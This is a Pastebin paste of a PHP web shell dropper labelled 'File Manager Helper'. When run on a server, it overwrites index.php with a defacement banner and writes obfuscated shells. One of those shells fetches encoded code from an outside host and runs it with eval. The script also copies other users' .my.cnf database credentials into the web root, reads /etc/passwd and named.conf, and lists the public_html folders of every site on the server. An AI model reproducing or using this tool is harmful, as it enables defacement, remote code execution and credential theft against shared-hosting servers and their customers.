Advertisement
ustadcage_48

File Manager Helper

Mar 3rd, 2016
245
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 8.89 KB | None | 0 0
  1. <title>UstadCage_48 Ganteng </title>
  2. <style>
  3. body {color:red}
  4. input[type=submit] {
  5.        background:red;
  6.        color:white;border: 1px solid red; }
  7. .fak {
  8.        background:red;
  9.        color:white;border: 1px solid red; }
  10.        a {color:red}
  11. </style>
  12. <b>
  13.  
  14. <?php
  15.  
  16. /* UstadCage_48 */
  17. /* Kerupuk */
  18. /* Jangan Hapus Nama Kami Di Script Ini :3 Hargailah Hasil Karya Kami */
  19.  
  20.     $nama = "index.php";
  21.     $isi = "<h3><center><font color=red> Patches By UstadCage_48 !!</font></center></h3>";
  22.     $fp = fopen($nama,"w");
  23.     fputs($fp, $isi);
  24.  
  25.   echo "<center><font color=red>";
  26.     echo php_uname();
  27.     echo "</font>";
  28.    
  29.     ?>
  30.  
  31.  
  32. <?php
  33.  
  34.  
  35. $submit = $_POST ['submites'];
  36. if(isset($submit)) {
  37.     $pilih = $_POST['pilihan'];
  38.  
  39.         if ( $pilih == 'fm') {
  40.         $script = "PD9waHANCg0KZXZhbChnenVuY29tcHJlc3MoYmFzZTY0X2RlY29kZSgnZUp6dFdXMXoyellTL3U0Wi93Y0UwWVhTVkJKbDEyMDl0cWhNWWp0cDU1STZFN3R6MDdGeUdwcUVKSXdwa2dkQ2tkMzIrdHR2RndBbGtDSnB4WmZycDJ0cTgyVVhEM1lYeis0Q2RNYmtSUElGbTBSOHdXVjcwRG5kMzJOQ0pHSWlXSm9JeWVPWmZybS94NmZ0R1dndi9Ca1BKdjlhSnBKbGsxa2F0RHVkMy9mM3BvbGdmakJ2dHlZZkxxK3VpWitSMWgxNzhFYXR6MzYwWktpaEpUZjQraFB4U0NZRlQ3UEl6K1lzYXhzdG1PYmY2bjhXekJQaURKK2RYNTVkLy9yaGd2eDQvZjdkYUg5dnVMNWV2RHJIYThUak96SVhiT3BSU2dTTFBKckpoNGdCSnBPVXlJZVVlVlN5ZStrR1dVWnhnT1F5WXFNcnZrZ2pSdDV3K1BYZWovMFpFME5YaTBCSFFjRE5iUkkrS005aTJadjZDeDQ5bkJENjBROGdKT1RLanpOeUdUUGFKY0ZTWlB3ekE5dHYvZUJ1SnBKbEhQYUNKRXJFQ1ZuTnVVUUoydERMNW42WXJFNEc2VDNCbndQNGVmN0RkL2hQKy8wOGdKbFlMSWtVSi9Qa014Ty9mekVrL25vK25VNUxnUDBwRjVtc2hJT29oWlhhRFNhWU1UczVKZjNiaUNGS0lrSUdZNVhDUVAxSHdrVEtmUFlmRDdaRC9WQU1MMmo1b0dTTXNHd0lXWkFJWC9Ja1BpRnhFdWU2YXcrMlI5VEZiUjA2SHFkTDJjMVl4QUxaeFNFKzBMdkdqU3lKT0NMM0ZzbHZQYTNRRTM3SWw5a0orUzY5UjhtSzNkNXhXUkpxV2RVN01HRG81alFjdWpuYlgxK2UvNHJYV3pGU1B5cTJaTVZET2Zmb0Q0TUJKUnJNbzNBYnNDaEsvVEFFdG5yMFcvMmNwWXE5SGoyZ3hJLzRMUFpvQUN2T2hNNE5oQXhIWjBzaGtBWWZmRGtuSjhRNVZablBzNHhKeU82M0Y5YzNUZ29pNTVQSyt4YmVRem9YSk9nQ2l6Sm15YUZ5Qkt1d2JWSThmd3RGQU90TTVBZXM3WXpIVHRkeG5hNFNvcUs2eVVDTjNhZFJFb0tLTGJWcWp0YkRtc05ES0Rud2lLYUIxWGhMUEk4NERubnhBcVg0TUZCMis0QXJ4UkxKWXFxTmJ5ckpTNFR6WERweWg2NC9Rdjh4TTNpOE5NUXE0SGFJSmF3RVFnQ3d0TjNpM3VDMHhZY2VtQUhYYjc1Qk05UUlxaDI0YWZGUFZFZTd4Y2t6RCszdEVLM2gwbE9yTU5LUjA4Y3hmUWN0ZEIxYkJvVXNITUV2WEV5OW9LVVZmUFBUdTR1ckcyY0t4YytzSVFpREpIMG95MjRjdVVnbnNiK0FleDMyUGl4QWYwdExhM1RXN2poRHpHT2lzczZqTThGWVRFZXExdjRDeStpSDVCeHlsUHc1K1NmcEQxMVVSVFlUVjltWjA2WUNDTkszQ0hPQmJRcHcvcXlBc1FNQ3dWOFFGZ2U2SFN5V2tlU3BMNlNMNzN1aEwzMUtGa3pPazlDajJLRXdGOHdNYXJZVE1sVFZ3TFFUOUpvUzlEbS9kekY1YkpWc2VRdTlsQkxWMUR5NlZHQkdUODJxYnZKbHFrb3dCTTVFWUVlVmx2UFRHRWR6M3BXSG5scU1FS044UGl3WlZxQlFvKzBNVThHQVVuTzVnQkxCQXU1SHdkd1hXUnV4SnRqelRXdklLdXhERHFyaG5YejV5czRrS1pabTBGVTVxSGNCK05MNWhDUjNRaWl5a2prV2ZRcFdEbldGUXNhYm9ickd3THhhdnZZRjg2YUFqZ2thekJkSjZCaVc1MllaSENZV1ZnYWdZcnM0UjdkQ3RaN2laM00vbmpIeUFYUmhJbkJaRWYzTE9iNk5vNWkrQzh2TFBMWXcxalRXMUVXUDdCMFNKUm4vRGU2UDFyUjErc0JqS05EdExCVThsdE8yODdmRTZSSmNlaHljbFdMVjZYUko3d2pvVUpFUWN4NkdFS0Y4YXRDM1ppa3ZLMjBlRFV1N0hxeldiRXUvbEg1dmswTHFPUlpOdCtrQ21ZWFZySkl2TVZ0WnBRN0VXbm1MTTFhbHJCcjRLSUYrQnQzL2pqb0tvWjQwYTd1VVVhcDVsd3c5ZlpSWlA3T1ZucWJFS3dOUlJhM0RRY1dxNi9uK1V0Ym9aZnVxdEdFaGw5V2syVlR4MWpTRlVFK1RsTVZseWpnclZUMWg4SFFsWUh2ZkJ0M3VOa0k5Y3k1Z2Z0MFE4dDc2NWR6WllEUTMxbWtRSlpreXNmTTRUWWI1M2htbnlyempBUkhKS3ZNT0IyWmR3RG02YStjcFZodnNPem00TWZBdjRnOHU5bFBZcytsdmVVdmJYcFhxMWxleFEyaG9xbDZ4cVZxRVJWTnpCUzV5cVZqQXcxWjhHL2wycnVESk9SZFBMRlFXUUVOeksrV2JaYjdhZXhyN2x6RitCbmlTQSt1VWViSUhtNFNwNjgvVjY5N0tBaitHdU9NaFNOKzExeWNib3g3eXp3VE9NOVNrQVAwZkhQaElFUGxaaGh0Wk9QSHJkK0dhZGxqZTF6YXIvV05SZmdWVnZVbSsyWHhrVFdxWGlzbmJLdm5lMkRybjVUSERreDVjemZvLzQ5a0U0NmVQVVM1S2FJZjg4WWZTVVd6cE84WEhmc1d4VGUydmpXWG1BRGMySjdnTjdwaU84SUtucmdwUGVyMG1QMm1leFJPczhiaVNSWXZOVWErU3JtcXJycE1CdllWd2hEc0NLSzdtTzMyaU4yNkZVWTlZaFlIYllVcE5mYjFjSnB3Tm9TajBpckZxRm1NZ2FJQkV3S2pyNHZaaUUveXg0cWIrSEtNcjhoaExzbjZ0dFUzbEhWTjRPWFQxdXdxcExvempQSDhiTk5YbWNveDdLcmcyNk9udEJDaCtWRGUycHFzdEx2V0tzZWt0WTVxN2dxL0hkR09qSXRwamcvU3M2MEd0M1VicGFHNUcyZFF1ajlVOXpkSWVqUXRkclRKbEN4OHF0a3ZNVUI5RHc4YWJQUFVyRXg5THY1WDUrTGdtcFRxUWR3ckozY0xOSjI2ODhNZ0t0eVZkOTJCd2VHU3BxUStkYmZYVS9kWWtoNWFOUElLNmFpdTNyYXh3dW9ld0xTSHZYOXY5STlkVlY1RCsvYlZwRFkxMXh4eXdQY3ZXWWpxb1Z6VjFpUGIxWkkwNTJGQ084aWcrdlI0MUlEUVZKRDNzTWNOcVMxSnAxazFOK245RnF0SEVyZXhZYi8yL1F0M0MrRCtoY08wNHJMcHkxUXorQ3FYTGJNVlJCanV4MGhhK3NEOG4yd1EzNU92V2k5WVc0QVQ1bDMxWC9ZRkxsYjVsck1obk1tUmQ5VnJxMmRRelczYXEvMFJIMm0yajhvSU03czhHZzBGSGZmTTJ0NERndXVRcUNlNllCREFlVHhQQWNqTGxIZEVwWFlSNHRZRjRaVU04TEc2VGlBZmtIZXk5TGFTb0h1bDRnM1JzSVgxa3MyWGtDd3VqVjQveC9RYmpld3ZqZFFRZUVYT0N0SkJ1NjVHT05raEhGaEtjU0lENWlYaXdVTUo2bE1NTnlxR0ZjZ2FIV0NnZVRGVFlGTlNqSFd6UURpeTBOeis5dVNRcFQ1bUZrbTVRak5ZdjhWMmNyR0pMWjdudU5DQytYTVZzSGVTK1Y1eDRjSUN6dlNTT2NQQlBQajMxT2FKR2RYQ3NWVmM3cUI2aDZ2NWU4ZTJ4bVN0VEFQY082WkNUT3AycmZCTE5iL0RqTFRUZHRIN0d3OTM5T05qZGo4RnhoUjlITy9oeFZPdkhQeElSaFEwekh1M3N4K0J3ZHo4T0t2dzRORGJLQmo5eW5ldWlINExKcFlpSm1pN24yc3ZSZndDb2djdW0nKSkpOw0KPz4=";
  41.         file_put_contents("a.php",base64_decode($script));
  42.          
  43.         echo "<p><center><font color=green>File Berhasil Di Ikeh Ikeh >_< <br>
  44.         Check File => <a href=a.php target=_blank><b>BebyYers</b></a></font></center><br>";
  45.          echo "&copy; 2016-2016 UstadCage_48 - BebyYers ~";
  46.         die();
  47.         }
  48.        
  49.        
  50.        
  51.         if ( $pilih == 'ganteng') {
  52.         $script = "PD9waHANCg0KLyogVXN0YWRDYWdlXzQ4ICovDQovKiBLZXJ1cHVrICovDQoNCiRiZWJ5X2xvdmUgPSBmaWxlX2dldF9jb250ZW50cygiXHg2OFx4NzRceDc0XHg3MFx4M2FceDJmXHgyZlx4NzhceDc0XHg2Mlx4NmNceDZmXHg3OFx4MmVceDZhXHg3N1x4MmVceDZjXHg3NFx4MmZceDYzXHg2OVx4NmVceDc0XHg2MVx4MmVceDc0XHg3OFx4NzQiKTsNCmV2YWwoc3RyX3JvdDEzKGd6aW5mbGF0ZShzdHJfcm90MTMoYmFzZTY0X2RlY29kZSgoJGJlYnlfbG92ZSkpKSkpKTsNCg0KPz4=";
  53.         file_put_contents("j.php",base64_decode($script));
  54.          
  55.         echo "<p><center><font color=green>File Berhasil Di Ikeh Ikeh >_< <br>
  56.         Check File => <a href=j.php target=_blank><b>BebyYers</b></a></font></center><br>";
  57.          echo "&copy; 2016-2016 UstadCage_48 - BebyYers ~";
  58.         die();
  59.         }
  60.     }
  61.  
  62. else {
  63.  
  64.     echo "<br><br><form method=post action=>
  65. <select class='fak' name=pilihan id=pilih>
  66. <option value=fm>File Manager</option>
  67. <option value=ganteng>Tools Reshell</option>
  68. </select>
  69. <input type=submit name=submites value='Buat >> '></form>";
  70. echo "&copy; 2016-2016 UstadCage_48 - BebyYers ~";
  71.  
  72. }
  73.  
  74. ?>
  75.  
  76.  
  77. <?php
  78.  
  79. @ini_set('display_errors',0);
  80. function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){
  81.     $ar0=explode($marqueurDebutLien, $text);
  82.     $ar1=explode($marqueurFinLien, $ar0[$i]);
  83.     return trim($ar1[0]);
  84. }
  85.  
  86. $d0mains = @file('/etc/named.conf');
  87. $domains = scandir("/var/named");
  88.  
  89. if ($domains or $d0mains)
  90. {
  91.     $domains = scandir("/var/named");
  92.     if($domains) {
  93. $count=1;
  94. $dc = 0;
  95. $list = scandir("/var/named");
  96. foreach($list as $domain){
  97. if(strpos($domain,".db")){
  98. $domain = str_replace('.db','',$domain);
  99. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
  100. $dirz = '/home/'.$owner['name'].'/.my.cnf';
  101. $path = getcwd();
  102.  
  103. if (is_readable($dirz)) {
  104. copy($dirz, ''.$path.'/'.$owner['name'].'.txt');
  105. $p=file_get_contents(''.$path.'/'.$owner['name'].'.txt');
  106. $password=entre2v2($p,'password="','"');
  107. $dc++;
  108. }
  109.  
  110. }
  111. }
  112.  
  113. $total = $dc;
  114. echo '<br>Total cPanel Found = '.$total.'<br />';
  115. }else{
  116. $d0mains = @file('/etc/named.conf');
  117.     if($d0mains) {
  118. $count=1;
  119. $dc = 0;
  120. $mck = array();
  121. foreach($d0mains as $d0main){
  122.     if(@eregi('zone',$d0main)){
  123.         preg_match_all('#zone "(.*)"#',$d0main,$domain);
  124.         flush();
  125.         if(strlen(trim($domain[1][0])) >2){
  126.             $mck[] = $domain[1][0];
  127.         }
  128.     }
  129. }
  130. $mck = array_unique($mck);
  131. $usr = array();
  132. $dmn = array();
  133. foreach($mck as $o) {
  134.     $infos = @posix_getpwuid(fileowner("/etc/valiases/".$o));
  135.     $usr[] = $infos['name'];
  136.     $dmn[] = $o;
  137. }
  138. array_multisort($usr,$dmn);
  139. $dt = file('/etc/passwd');
  140. $passwd = array();
  141. foreach($dt as $d) {
  142.     $r = explode(':',$d);
  143.     if(strpos($r[5],'home')) {
  144.         $passwd[$r[0]] = $r[5];
  145.     }
  146. }
  147. $l=0;
  148. $j=1;
  149. foreach($usr as $r) {
  150. $dirz = '/home/'.$r.'/.my.cnf';
  151. $path = getcwd();
  152. if (is_readable($dirz)) {
  153. copy($dirz, ''.$path.'/'.$r.'.txt');
  154. $p=file_get_contents(''.$path.'/'.$r.'.txt');
  155. $password=entre2v2($p,'password="','"');
  156. $dc++;
  157.                 flush();
  158.                 $l=$l?0:1;
  159.                 $j++;
  160.                 }
  161.             }
  162.             }
  163.  
  164. $total = $dc;
  165. echo '<br>Total cPanel Found = '.$total.'<br />';
  166.  
  167. }
  168. }else{
  169. echo "<br><font color='red'>Info Cpanel : </font> <font color='green'> Not Accessible!</font>";
  170. }
  171.  
  172. ?>
  173.  
  174. <?php
  175.  
  176.    
  177.      ($sm = ini_get('safe_mode') == 0) ? $sm = 'off': die('<br><b> Jumping Info : <font color="green">Njirr safe_mode On Cuy :3</font></b>');
  178.     set_time_limit(0);
  179.     ###################
  180.     @$passwd = fopen('/etc/passwd','r');
  181.     if (!$passwd) { die('<br><b> Jumping Info : <font color="green">Wew Ternyata Tidak Ada Web Yg Bisa Di Ikeh Ikeh >_< </font></b>'); }
  182.     $pub = array();
  183.     $users = array();
  184.     $conf = array();
  185.     $i = 0;
  186.     while(!feof($passwd))
  187.     {
  188.         $str = fgets($passwd);
  189.         if ($i > 35)
  190.             {
  191.             $pos = strpos($str,':');
  192.             $username = substr($str,0,$pos);
  193.             $dirz = '/home/'.$username.'/public_html/';
  194.             if (($username != ''))
  195.                 {
  196.                 if (is_readable($dirz))
  197.                     {
  198.                     array_push($users,$username);
  199.                     array_push($pub,$dirz);
  200.                     }
  201.                 }
  202.             }
  203.         $i++;
  204.     }
  205.    
  206.  
  207.     echo " Jumping Info : Di Temukan <font color=green> ".sizeof($users)." </font> Web Dalam 1 Server >_<\n"."<br />";
  208.  
  209.     ?>
  210.  
  211.  
  212. </b>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement